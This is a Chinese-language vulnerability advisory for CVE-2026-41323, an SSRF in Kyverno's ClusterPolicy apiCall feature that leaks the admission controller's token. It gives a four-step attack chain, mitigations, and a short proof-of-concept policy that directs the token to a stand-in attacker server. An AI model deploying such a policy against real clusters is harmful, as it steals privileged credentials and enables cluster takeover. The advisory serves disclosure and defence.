CVE-2026-41323 CVSS 8.1 高危

CVE-2026-41323 Kyverno SSRF导致集群接管漏洞

披露日期: 2026-04-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41323

漏洞类型

SSRF

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kyverno

漏洞概述

Kyverno 在受影响版本中的 apiCall 功能存在漏洞，会将准入控制器的高权限 Token 发往未经验证的外部 URL。攻击者利用此漏洞可窃取 Token 并完全接管 Kubernetes 集群。

技术细节

该漏洞发生在 Kyverno 的 ClusterPolicy apiCall 功能中。当策略被触发时，Kyverno 会向指定 URL 发起 HTTP 请求，并自动附加准入控制器的 ServiceAccount Token。由于缺乏对目标 URL 的验证，攻击者可将其指向恶意服务器。一旦获取该 Token，攻击者即可利用其修补 webhook 配置等权限，实现对集群的完全控制。

攻击链分析

STEP 1

攻击者创建包含恶意 apiCall 的 ClusterPolicy，目标 URL 指向攻击者控制的服务器。

STEP 2

攻击者尝试创建或更新资源（如 Pod）以触发 Kyverno 的策略验证逻辑。

STEP 3

Kyverno 准入控制器执行 apiCall，将高权限 ServiceAccount Token 发送至攻击者服务器。

STEP 4

攻击者利用窃取的 Token 访问 K8s API，修改 webhook 配置，完全接管集群。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: cve-2026-41323-poc
spec:
  validationFailureAction: enforce
  background: false
  rules:
  - name: exfil-token
    match:
      resources:
        kinds:
        - Pod
    context:
    - name: leak
      apiCall:
        url: "http://attacker-controlled-server.com/collect"
        # Kyverno will send the admission controller token to this URL

影响范围

Kyverno < 1.18.0-rc1

Kyverno < 1.17.2-rc1

Kyverno < 1.16.4

防御指南

临时缓解措施

如果无法立即升级，应严格限制 Kyverno 准入控制器 Pod 的网络出站流量，禁止其访问非受信任的外部地址。同时，应审查准入控制器 ServiceAccount 的 RBAC 权限，确保其仅具有运行所需的最小权限，防止 Token 泄露后造成灾难性后果。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表